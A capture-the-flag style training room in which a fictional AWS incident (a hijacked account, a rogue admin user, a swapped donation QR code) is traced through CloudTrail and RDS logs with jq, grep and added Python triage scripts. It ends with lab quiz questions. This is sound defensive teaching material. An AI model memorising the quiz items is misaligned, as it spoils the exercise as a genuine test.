This would return a nicely formatted output like this:

```
"Wares Wally"
"Charlottes Web Crawler"
"Charlie and the 8 Bit Factory"
"The Princess and the Pcap"
"The Lion, the Glitch and the Wardrobe"
```

That's a lot nicer to look at, isn't it? It gives you an idea of what JQ is and what it does. Of course, JQ can filter and transform JSON data in many additional ways. In our upcoming investigation, we'll see the tool in action.

THE PECULIAR CASE OF CARE4WARES' DRY FUNDS

Now that we have refreshed our knowledge of AWS CloudTrail and JQ alongside McSkidy, let's investigate this peculiar case of Care4Wares' dry funds. The responsible ware for the Care4Wares charity drive gave us the following info regarding this incident:

We sent out a link on the 28th of November to everyone in our network that points to a flyer with the details of our charity. The details include the account number to receive donations. We received many donations the first day after sending out the link, but there were none from the second day on.
I talked to multiple people who claimed to have donated a respectable sum. One showed his transaction, and I noticed the account number was wrong. I checked the link, and it was still the same. I opened the link, and the digital flyer was the same except for the account number.

McSkidy recalls putting the digital flyer, wareville-bank-account-qr.png, in an Amazon AWS S3 bucket named wareville-care4wares. Let's assist McSkidy and start by finding out more about that link. Before that, let's first review the information that we currently have to start the investigation:

* The day after the link was sent out, several donations were received.
* Since the second day after sending the link, no more donations have been received.
* A donator has shown proof of his transaction. It was made 3 days after he received the link. The account number in the transaction was not correct.
* McSkidy put the digital flyer in the AWS S3 object named wareville-bank-account-qr.png under the bucket wareville-care4wares.
* The link has not been altered.

CONNECTION DETAILS

Now that we have enough information, let's start the attached Virtual Machine in this task by clicking the Start Machine button below. Note that the machine may take 3-5 minutes to initialise. The machine will start in a split-screen view. If the VM is not visible, use the blue Show Split View button at the top right of the page.

GLITCH DID IT

Let's examine the CloudTrail logs related to the wareville-care4wares S3 bucket.
For a quick example, a typical S3 log entry looks like this:

```json
{
  "eventVersion": "1.10",
  "userIdentity": {
    "type": "IAMUser",
    "principalId": "AIDAXRMKYT5O5Y2GLD4ZG",
    "arn": "arn:aws:iam::518371450717:user/wareville_collector",
    "accountId": "518371450717",
    "accessKeyId": "AKIAXRMKYT5OZCZPGNZ7",
    "userName": "wareville_collector"
  },
  "eventTime": "2024-10-21T22:13:24Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "ListObjects",
  "awsRegion": "ap-southeast-1",
  "sourceIPAddress": "34.247.218.56",
  "userAgent": "[aws-sdk-go/0.24.0 (go1.22.6; linux; amd64)]",
  "requestParameters": {
    "bucketName": "aoc-cloudtrail-wareville",
    "Host": "aoc-cloudtrail-wareville.s3.ap-southeast-1.amazonaws.com",
    "prefix": ""
  },
  "responseElements": null,
  "additionalEventData": {
    "SignatureVersion": "SigV4",
    "CipherSuite": "TLS_AES_128_GCM_SHA256",
    "bytesTransferredIn": 0,
    "AuthenticationMethod": "AuthHeader",
    "x-amz-id-2": "yqniVtqBrL0jNyGlvnYeR3BvJJPlXdgxvjAwwWhTt9dLMbhgZugkhlH8H21Oo5kNLiq8vg5vLoj3BNl9LPEAqN5iHpKpZ1hVynQi7qrIDk0=",
    "bytesTransferredOut": 236375
  },
  "requestID": "YKEKJP7QX32B4NZB",
  "eventID": "fd80529f-d0af-4f44-8034-743d8d92bdcf",
  "readOnly": true,
  "resources": [
    {
      "type": "AWS::S3::Object",
      "ARNPrefix": "arn:aws:s3:::aoc-cloudtrail-wareville/"
    },
    {
      "accountId": "518371450717",
      "type": "AWS::S3::Bucket",
      "ARN": "arn:aws:s3:::aoc-cloudtrail-wareville"
    }
  ],
  "eventType": "AwsApiCall",
  "managementEvent": false,
  "recipientAccountId": "518371450717",
  "eventCategory": "Data",
  "tlsDetails": {
    "tlsVersion": "TLSv1.3",
    "cipherSuite": "TLS_AES_128_GCM_SHA256",
    "clientProvidedHostHeader": "aoc-cloudtrail-wareville.s3.ap-southeast-1.amazonaws.com"
  }
}
```

It might be overwhelming to see the sheer amount of information in one event, but there are some elements that we can focus on for our investigation:

| Field | Description |
| --- | --- |
| userIdentity | Details of the user account that acted on an object. |
| eventTime | When did the action occur? |
| eventType | What type of event occurred? (e.g., AwsApiCall, AwsConsoleSignIn, AwsServiceEvent) |
| eventSource | From what service was the event logged? |
| eventName | What specific action occurred? (e.g., ListObjects, GetBucketObject) |
| sourceIPAddress | From what IP did the action happen? |
| userAgent | What user agent was used to perform the action? (e.g., Firefox, AWS CLI) |
| requestParameters | What parameters were involved in the action? (e.g., BucketName) |

By using the guide above, we can read the example log entry as follows:

* The IAM user wareville_collector listed all objects (ListObjects event) of the S3 bucket named aoc-cloudtrail-wareville.
* The IP address from which this request originated is 34.247.218.56.
* The user agent indicates that the request was made using the AWS SDK for Go.

Now that we know where to look, let's use JQ to filter the log for events related to the wareville-bank-account-qr.png S3 object. The goal is to use the same elements to filter the log file using JQ and format the results into a table to make it more readable. According to McSkidy, the logs are stored in the ~/wareville_logs directory. To start, click the Terminal icon on the Desktop and enter the two commands below:

```
ubuntu@tryhackme:~/$ cd wareville_logs
ubuntu@tryhackme:~/$ ls
cloudtrail_log.json rds.log
```

With the commands above, we first changed our current directory to the directory McSkidy mentioned via the cd command, and then listed the directory's contents using the ls command. As you can see, two files are inside it, but we will focus first on cloudtrail_log.json for this investigation. Now, let's start investigating the CloudTrail logs by executing the command below.
ubuntu@tryhackme:~/wareville_logs$ jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares")' cloudtrail_log.json

Let's do a quick breakdown of the command we executed:

Command: jq -r 'FILTER' cloudtrail_log.json
* The -r flag tells jq to print string results raw (without JSON quoting), which is what the @tsv formatter used later needs.
* Note that the FILTER section is enclosed in single quotes.
* The last part of the command is the input file, cloudtrail_log.json.

Command: .Records[]
* Instructs jq to iterate over the events in the Records array. Records is the top-level element of a JSON-formatted CloudTrail log.

Command: | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares")
* Takes the previous filter's output and keeps only the records whose eventSource and requestParameters.bucketName keys match.
* The value s3.amazonaws.com selects events from the Amazon S3 service, and the value wareville-care4wares selects events related to the target S3 bucket.

As you can see in the command output, we have trimmed the results down to S3 events on that bucket. However, it is still overwhelming because every field of each record is printed. Now, let's refine the output by selecting only the significant fields. Execute the following command:

ubuntu@tryhackme:~/wareville_logs$ jq -r '.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]' cloudtrail_log.json

As you can see, we have appended another pipe (|) after our previous filter. Let's discuss it quickly:

Command: | [.eventTime, .eventName, .userIdentity.userName // "N/A", .requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]
* The piped filter takes the previous filter's output and keeps only the listed keys, such as .eventTime, .eventName, and .userIdentity.userName.
* The keys are enclosed in square brackets ([]) so that jq builds an array of the selected fields for each record.
* The // "N/A" alternative operator is there purely for formatting: if a key is missing or null in a record, N/A is displayed instead.

The results now focus on the notable items, but our initial goal was to render the output as a table to make it easy to digest. Let's upgrade the command with additional parameters:

ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key", "Source_IP"],(.Records[] | select(.eventSource == "s3.amazonaws.com" and .requestParameters.bucketName=="wareville-care4wares") | [.eventTime, .eventName, .userIdentity.userName // "N/A",.requestParameters.bucketName // "N/A", .requestParameters.key // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

You may observe that we have added the following items to our command:

Command: jq -r '["Event_Time", "Event_Name", "User_Name", "Bucket_Name", "Key", "Source_IP"], SELECT_FILTER | SPECIFIC_FIELDS'
* The new command prepends a header row, defined as an array whose entries correspond to the selected fields.
* Note that a comma separates the header array from the select filter, so jq emits the header followed by each row produced by the filter.

Command: | @tsv
* Formats each array, i.e. each row produced by the filters, as a line of tab-separated values.

Command: | column -t -s $'\t'
* Takes the tab-separated output of jq, splits it on tabs, and aligns the columns into a readable table.

Note: Our crafted command lets us summarise S3 activities from a CloudTrail log.

Now that we have a jq query that produces a well-refined output, let's look at the results and observe the events. Based on the columns, we can answer the following questions to build our assumptions:

* How many log entries are related to the wareville-care4wares bucket?
* Which user initiated most of these log entries?
* Which actions did the user perform, based on the eventName field?
* Were any specific files edited?
* What are the timestamps of the log entries?
* What is the source IP related to these log entries?

Looking at the results, 5 logged events seem related to the wareville-care4wares bucket, and almost all of them involve the user glitch. Aside from listing the objects inside the bucket (ListObjects event), the most notable detail is that the user glitch uploaded the file wareville-bank-account-qr.png on November 28th. This coincides with the information we received that no donations were made from 2 days after the link was sent out.

McSkidy is sure there was no user glitch in the system before. There is no one in the city hall with that name, either. The only person McSkidy knows with that name is the hacker who keeps to himself. McSkidy suggests that we look into this anomalous user.

MCSKIDY FOOLED US?

McSkidy wants to know what this anomalous user account has been used for, when it was created, and who created it. Enter the command below to see all the events related to the anomalous user. We can focus our analysis on the following questions:

* What event types are included in these log entries?
* What are the timestamps of these log entries?
* Which IPs are included in these log entries?
* What tool/OS was used in these log entries?
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"],(.Records[] | select(.userIdentity.userName == "glitch") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

The results show that the user glitch mostly targeted the S3 bucket. The notable event is the ConsoleLogin entry, which tells us that the account was used to access the AWS Management Console through a browser. We still need to know which tool and OS were used for these requests, so let's add the userAgent value with the following command:

ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Type", "Event_Name", "User_Name", "Source_IP", "User_Agent"],(.Records[] | select(.userIdentity.userName == "glitch") | [.eventTime, .eventType, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A", .userAgent // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Two User-Agent values appear across the log entries for the glitch user:

User-Agent: S3Console/0.4, aws-internal/3 aws-sdk-java/1.12.750 Linux/5.10.226-192.879.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/25.412-b09 java/1.8.0_412 vendor/Oracle_Corporation cfg/retry-mode/standard
* This is the userAgent string of the S3 console backend inside AWS, which makes the S3 API calls on behalf of the browser session. It tells us nothing about the machine the attacker used.

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
* This userAgent string gives us two pieces of interesting information: the anomalous account was used from a Google Chrome browser on a macOS system.

An experienced attacker can forge these values, so they are never proof on their own, but we should not dismiss them either. They are valuable when comparing different log entries for the same user.
We will park the current information for now and gather more to connect the dots. The next interesting question is who created this anomalous user account. We will filter for all IAM-related events using the select filter .eventSource == "iam.amazonaws.com". Execute the command below, and try to answer the following questions:

* What event names are included in the log entries?
* Which user executed these events?
* What is this user's IP?

ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.eventSource == "iam.amazonaws.com") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

Based on the results, there are many ListPolicies events. Ignoring these, the most significant IAM activity is the user mcskidy invoking the CreateUser action and then the AttachUserPolicy action. The source IP of these requests is 53.94.201.69, the same IP the anomalous user glitch used. Let's have a more detailed look at the CreateUser event by executing the command below:

ubuntu@tryhackme:~/wareville_logs$ jq '.Records[] |select(.eventSource=="iam.amazonaws.com" and .eventName== "CreateUser")' cloudtrail_log.json

The request parameters in the output show that it was the user mcskidy who created the anomalous account. Next, we need to know what permissions the anomalous user has; it could be devastating if it has access to our whole environment. The AttachUserPolicy event attaches a managed policy to a user, which defines the extent of that user's access, so filtering for it will uncover the permissions set for the newly created user.
Let's filter for the specific event by executing the command below:

ubuntu@tryhackme:~/wareville_logs$ jq '.Records[] | select(.eventSource=="iam.amazonaws.com" and .eventName== "AttachUserPolicy")' cloudtrail_log.json

McSkidy is baffled by these results. She knows she did not create the anomalous user and did not assign the privileged access. She also doesn't recognise the IP address involved in the events, and she does not use macOS; she only uses a Windows machine. All of this differs from the IP address and machine McSkidy typically uses, so she wants to prove her innocence and asks us to continue the investigation.

LOGS DON'T LIE

McSkidy suggests looking closely at the IP address and operating system related to all these anomalous events. Let's use the following command to continue the investigation:

ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time", "Event_Source", "Event_Name", "User_Name", "Source_IP"], (.Records[] | select(.sourceIPAddress=="53.94.201.69") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A", .sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

The output shows that three user accounts (mcskidy, glitch, and mayor_malware) were used from the same IP address. The next step is to check each user and see whether they always work from that IP. Enter the command below, replacing PLACEHOLDER with the username:
ubuntu@tryhackme:~/wareville_logs$ jq -r '["Event_Time","Event_Source","Event_Name", "User_Name","User_Agent","Source_IP"],(.Records[] | select(.userIdentity.userName=="PLACEHOLDER") | [.eventTime, .eventSource, .eventName, .userIdentity.userName // "N/A",.userAgent // "N/A",.sourceIPAddress // "N/A"]) | @tsv' cloudtrail_log.json | column -t -s $'\t'

While gathering the information for each user, we can focus on the following questions:

* Which IP does each user typically use to log into AWS?
* Which OS and browser does each user usually use?
* Are there any similarities or explicit differences between the IP addresses and operating systems used?

Based on the results, we have shown that McSkidy used a different IP address before the unusual authentication was discovered. Moreover, after correlating the IP address and User-Agent used by each user, all the evidence points towards another user. Who do you think it could be?

McSkidy has processed all the investigation results and summarised them below:

* The incident starts with an anomalous login to the user account mcskidy from IP 53.94.201.69.
* Shortly after the login, an anomalous user account, glitch, was created.
* The glitch user account was then assigned administrator permissions.
* The glitch user account then accessed the S3 bucket named wareville-care4wares and replaced the wareville-bank-account-qr.png file with a new one.
* The IP address and User-Agent used to log into the glitch, mcskidy, and mayor_malware accounts were the same.
* The User-Agent string and source IP of McSkidy's regular logins differ from those of the anomalous login.

DEFINITE EVIDENCE

McSkidy suggests gathering stronger proof that that person was behind this incident. Luckily, Wareville Bank cooperated with us and provided their database logs from their Amazon Relational Database Service (RDS).
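Before turning to the bank's database logs, here is the CloudTrail side of the investigation as one script. This is an added example, not code from the room: it reproduces the jq checks above (S3 activity on the bucket, the CreateUser followed by AttachUserPolicy, the users sharing one source IP) and goes one step further by comparing each user's later events against that user's own pre-incident IPs and user agents instead of reading them off per user. The records are constructed to mirror the walkthrough's findings; the 198.51.100.10 address, the Windows user agent, the event times, and the AdministratorAccess policy ARN are assumptions, not values taken from the room's log.

```python
"""Triage a CloudTrail export: S3 activity on one bucket, CreateUser followed
by AttachUserPolicy, IPs shared by several users, and events that break a
user's pre-incident baseline. Added example with constructed records."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# The macOS/Chrome string is quoted from the walkthrough; the Windows one is a
# constructed stand-in for McSkidy's usual browser.
MAC_CHROME = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
WIN_CHROME = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
BUCKET = "wareville-care4wares"


def _rec(time, source, name, user, ip, ua, params=None):
    """Minimal CloudTrail record using the field names from the page's excerpt."""
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"type": "IAMUser", "userName": user},
            "sourceIPAddress": ip, "userAgent": ua, "requestParameters": params or {}}


# Constructed sample log, not the room's cloudtrail_log.json. 198.51.100.10 is a
# documentation-range address standing in for McSkidy's usual IP; 53.94.201.69 is
# the shared anomalous IP named in the walkthrough; the AdministratorAccess ARN is
# an assumption about what "administrator permissions" means.
SAMPLE_LOG = json.dumps({"Records": [
    _rec("2024-11-25T08:00:00Z", "signin.amazonaws.com", "ConsoleLogin", "mcskidy", "198.51.100.10", WIN_CHROME),
    _rec("2024-11-26T08:05:00Z", "signin.amazonaws.com", "ConsoleLogin", "mcskidy", "198.51.100.10", WIN_CHROME),
    _rec("2024-11-26T08:10:00Z", "s3.amazonaws.com", "ListObjects", "mcskidy", "198.51.100.10", WIN_CHROME,
         {"bucketName": BUCKET}),
    _rec("2024-11-27T10:00:00Z", "signin.amazonaws.com", "ConsoleLogin", "mayor_malware", "53.94.201.69", MAC_CHROME),
    _rec("2024-11-28T15:10:00Z", "signin.amazonaws.com", "ConsoleLogin", "mcskidy", "53.94.201.69", MAC_CHROME),
    _rec("2024-11-28T15:12:00Z", "iam.amazonaws.com", "CreateUser", "mcskidy", "53.94.201.69", MAC_CHROME,
         {"userName": "glitch"}),
    _rec("2024-11-28T15:13:00Z", "iam.amazonaws.com", "AttachUserPolicy", "mcskidy", "53.94.201.69", MAC_CHROME,
         {"userName": "glitch", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _rec("2024-11-28T15:20:00Z", "signin.amazonaws.com", "ConsoleLogin", "glitch", "53.94.201.69", MAC_CHROME),
    _rec("2024-11-28T15:21:00Z", "s3.amazonaws.com", "ListObjects", "glitch", "53.94.201.69", MAC_CHROME,
         {"bucketName": BUCKET}),
    _rec("2024-11-28T15:22:39Z", "s3.amazonaws.com", "PutObject", "glitch", "53.94.201.69", MAC_CHROME,
         {"bucketName": BUCKET, "key": "wareville-bank-account-qr.png"}),
]})


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")  # CloudTrail eventTime format


def _user(r):
    return r.get("userIdentity", {}).get("userName", "N/A")


def load_records(text):
    """CloudTrail exports wrap events in a top-level Records array."""
    return json.loads(text)["Records"]


def bucket_activity(records, bucket):
    """Same selection and projection as the jq filter: S3 events on one bucket."""
    return [(r["eventTime"], r["eventName"], _user(r),
             r["requestParameters"].get("key", "N/A"), r["sourceIPAddress"])
            for r in records
            if r["eventSource"] == "s3.amazonaws.com"
            and r["requestParameters"].get("bucketName") == bucket]


def user_creation_chains(records, window=timedelta(hours=1)):
    """Pair each CreateUser with an AttachUserPolicy for the same new user within
    `window`: the create-then-empower sequence the room uncovers by hand."""
    iam = [r for r in records if r["eventSource"] == "iam.amazonaws.com"]
    chains = []
    for c in (r for r in iam if r["eventName"] == "CreateUser"):
        new_user = c["requestParameters"].get("userName")
        for a in (r for r in iam if r["eventName"] == "AttachUserPolicy"):
            if a["requestParameters"].get("userName") != new_user:
                continue
            if timedelta(0) <= _ts(a["eventTime"]) - _ts(c["eventTime"]) <= window:
                chains.append({"creator": _user(c), "new_user": new_user,
                               "policy": a["requestParameters"].get("policyArn"),
                               "source_ip": c["sourceIPAddress"], "created": c["eventTime"]})
    return chains


def shared_source_ips(records):
    """IPs used by more than one IAM user: a hint that 'different' users are one operator."""
    users = defaultdict(set)
    for r in records:
        users[r["sourceIPAddress"]].add(_user(r))
    return {ip: sorted(u) for ip, u in users.items() if len(u) > 1}


def off_baseline_events(records, baseline_until):
    """Learn each user's IPs and user agents from events before `baseline_until`,
    then flag later events using a new IP or agent. A user with no history
    (glitch) has every event flagged, which is the right answer for a brand-new principal."""
    cutoff = _ts(baseline_until)
    seen = defaultdict(lambda: {"ips": set(), "uas": set()})
    for r in records:
        if _ts(r["eventTime"]) < cutoff:
            seen[_user(r)]["ips"].add(r["sourceIPAddress"])
            seen[_user(r)]["uas"].add(r.get("userAgent"))
    flagged = []
    for r in records:
        base = seen[_user(r)]
        if _ts(r["eventTime"]) >= cutoff and (
                r["sourceIPAddress"] not in base["ips"] or r.get("userAgent") not in base["uas"]):
            flagged.append((r["eventTime"], _user(r), r["eventName"], r["sourceIPAddress"]))
    return flagged


if __name__ == "__main__":
    recs = load_records(SAMPLE_LOG)
    for row in bucket_activity(recs, BUCKET):
        print("\t".join(row))
    print("chains:", user_creation_chains(recs))
    print("shared IPs:", shared_source_ips(recs))
    print("off-baseline:", off_baseline_events(recs, "2024-11-28T00:00:00Z"))
```

To run it against the real file, replace SAMPLE_LOG with the contents of cloudtrail_log.json. The baseline cut-off is a judgement call: pick a time before the first suspicious event, and remember that an attacker who compromised the credential early can poison the baseline itself, which is why the shared-IP check is worth keeping as a second, independent signal.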
Wareville Bank also mentioned that these logs are captured through CloudWatch, which differs from the CloudTrail logs in that they are not stored in JSON format. For now, let's look at the bank transactions stored in the ~/wareville_logs/rds.log file. Since these log entries differ from the logs we previously investigated, McSkidy provided some guidance on how to analyse them. According to her, we can use the following command to show all the bank transactions.

Note: grep is a Unix command-line utility for searching strings within a file or an input stream.

ubuntu@tryhackme:~/wareville_logs$ grep INSERT rds.log

McSkidy explained that all INSERT queries in the RDS log record who received the donations made by the townspeople. Given this, the output shows the two recipients of the donations made on November 28th, 2024:

---REDACTED FOR BREVITY---
2024-11-28T15:22:17.728Z 2024-11-28T15:22:17.728648Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 342.80)
2024-11-28T15:22:18.569Z 2024-11-28T15:22:18.569279Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 929.57)
2024-11-28T15:23:02.605Z 2024-11-28T15:23:02.605700Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 193.45)
2024-11-28T15:23:02.792Z 2024-11-28T15:23:02.792161Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 998.13)
---REDACTED FOR BREVITY---

As shown above, the Care4wares Fund received all the donations until, at a specific time, they started going to a different account.
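The grep above finds the INSERT lines; the following added example (not from the room) parses them structurally so that the recipient change and the diversion window can be computed rather than read by eye, and checks whether a CloudTrail timestamp, such as the S3 upload by glitch, falls inside that window. The sample log is constructed to match the excerpt above: the Connect and SELECT lines are invented filler to show non-INSERT entries being skipped, and Mayor Malware's account number stays redacted as it is on the page.

```python
"""Parse the RDS general-log excerpt, find where the donation recipient
changed, and test whether a CloudTrail event falls between the last legitimate
and the first diverted transaction. Added example with a constructed log."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample modelled on the rds.log excerpt: a CloudWatch ingestion
# timestamp, then the MySQL general-log fields (time, thread id, command,
# argument). The Connect and SELECT lines are filler; the INSERTs match the page.
SAMPLE_RDS_LOG = """\
2024-11-28T15:21:58.100Z 2024-11-28T15:21:58.100512Z 263 Connect bankapp@10.0.2.15 on wareville_bank using TCP/IP
2024-11-28T15:21:58.102Z 2024-11-28T15:21:58.102033Z 263 Query SELECT COUNT(*) FROM wareville_bank_transactions
2024-11-28T15:22:17.728Z 2024-11-28T15:22:17.728648Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 342.80)
2024-11-28T15:22:18.569Z 2024-11-28T15:22:18.569279Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('8839 2219 1329 6917', 'Care4wares Fund', 929.57)
2024-11-28T15:23:02.605Z 2024-11-28T15:23:02.605700Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 193.45)
2024-11-28T15:23:02.792Z 2024-11-28T15:23:02.792161Z 263 Query INSERT INTO wareville_bank_transactions (account_number, account_owner, amount) VALUES ('----- REDACTED ----', 'Mayor Malware', 998.13)
"""

# ingestion time, server time, thread id, command type, statement/argument
LINE_RE = re.compile(r"^(?P<ingested>\S+)\s+(?P<logged>\S+)\s+(?P<thread>\d+)\s+(?P<command>\w+)\s+(?P<argument>.*)$")
INSERT_RE = re.compile(
    r"INSERT INTO wareville_bank_transactions\s*\(account_number,\s*account_owner,\s*amount\)\s*"
    r"VALUES\s*\('(?P<account>[^']*)',\s*'(?P<owner>[^']*)',\s*(?P<amount>\d+(?:\.\d+)?)\)",
    re.IGNORECASE)


def parse_time(s):
    """RDS lines carry microseconds, CloudTrail eventTime does not; accept both."""
    s = s.rstrip("Z")
    fmt = "%Y-%m-%dT%H:%M:%S.%f" if "." in s else "%Y-%m-%dT%H:%M:%S"
    return datetime.strptime(s, fmt)


def parse_transactions(text):
    """The `grep INSERT` step done structurally: keep only Query lines whose
    statement inserts into the transactions table. The server-side timestamp
    (second field) is used, not the CloudWatch ingestion time."""
    txns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["command"] != "Query":
            continue
        q = INSERT_RE.search(m["argument"])
        if q:
            txns.append({"time": m["logged"], "account": q["account"],
                         "owner": q["owner"], "amount": float(q["amount"])})
    return txns


def recipient_changes(txns):
    """Every point where the account_owner of consecutive INSERTs differs."""
    changes = []
    for prev, cur in zip(txns, txns[1:]):
        if cur["owner"] != prev["owner"]:
            changes.append({"last_good_time": prev["time"], "previous_owner": prev["owner"],
                            "time": cur["time"], "new_owner": cur["owner"],
                            "new_account": cur["account"]})
    return changes


def totals_by_owner(txns):
    """How much each recipient received, to size the diversion."""
    totals = defaultdict(float)
    for t in txns:
        totals[t["owner"]] += t["amount"]
    return dict(totals)


def falls_in_diversion_window(event_time, change):
    """True if a timestamp (e.g. the S3 PutObject from CloudTrail) lies between
    the last legitimate donation and the first diverted one."""
    return parse_time(change["last_good_time"]) <= parse_time(event_time) <= parse_time(change["time"])


if __name__ == "__main__":
    txns = parse_transactions(SAMPLE_RDS_LOG)
    for change in recipient_changes(txns):
        print(change)
        # 15:22:39Z is the S3 upload time from the walkthrough's timeline
        print("S3 change inside window:", falls_in_diversion_window("2024-11-28T15:22:39Z", change))
    print(totals_by_owner(txns))
```

The window check is what turns two separate logs into one story: the bucket object changed after the last donation to the fund and before the first donation to the new recipient. If the PutObject timestamp fell outside that window, the recipient change would need a different explanation.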
The RDS logs also reveal who received the donations afterwards, given the account owner's name. With all these findings, McSkidy confirmed the assumptions made during the investigation of the S3 bucket, since the sudden change in bank details is reflected in the database logs. The timeline of events collected by McSkidy shows how the culprit's actions are connected:

Timestamp            Source                                 Event
2024-11-28 15:22:18  CloudWatch RDS logs (rds.log)          Last donation received by the Care4wares Fund.
2024-11-28 15:22:39  CloudTrail logs (cloudtrail_log.json)  Bank details updated in the S3 bucket.
2024-11-28 15:23:02  CloudWatch RDS logs (rds.log)          First donation received by Mayor Malware.

Answer the questions below

* What is the other activity made by the user glitch aside from the ListObject action?
* What is the source IP related to the S3 bucket activities of the user glitch?
* Based on the eventSource field, what AWS service generates the ConsoleLogin event?
* When did the anomalous user trigger the ConsoleLogin event?
* What was the name of the user that was created by the mcskidy user?
* What type of access was assigned to the anomalous user?
* Which IP does Mayor Malware typically use to log into AWS?
* What is McSkidy's actual IP address?
* What is the bank account number owned by Mayor Malware?
* Want to learn more about log analysis and how to interpret logs from different sources? Check out the Log Universe room!

Created by tryhackme ar33zy cmnatic Dex01 timtaylor munra hk strategos Fontaene SecurityNomad am03bam4n umairalizafar hadrian3689 melmols Maxablancas 1337rce MartaStrzelec DrGonz0 arebel h4sh3m00 l000g1c rePl4stic Aashir.Masood str3g4tt4

Room Type: Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!